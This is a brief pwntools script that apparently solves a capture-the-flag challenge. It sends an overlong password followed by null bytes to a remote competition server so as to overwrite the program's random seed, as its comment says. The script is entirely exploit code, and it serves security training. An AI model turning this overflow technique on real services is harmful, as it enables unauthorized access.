from pwn import *

r = remote("guessermaster.challs.olicyber.it", 35006)

passwd = "ILCPSKLRYVMCPJNBPBWLLSREHFMXRKECWITRSGLREXVTJMXYPUNBQFGXMUVGFAJCLFVENHYUHUORJOSAMIBDNJDBEYHKBSOMBLTOUUJDRBWCRRCGBFLQPOTTPEGRWVGAJCRGWDLPGITYDVHEDTUSIPPYVXSUVBVFENODQASAJOYOMGSQCPJLHBMDAHYVIUEMKSSDSLDEBESNNNGPESDNTRRVYSUIPYWATPFOELTHROWHFEXLWDYSVSPWLKFBLFD"

r.recvuntil(": ")
r.sendline(passwd.encode() + b"\0\0\0\0\0") #overwrite random's seed
r.recvline()

print(r.recvline())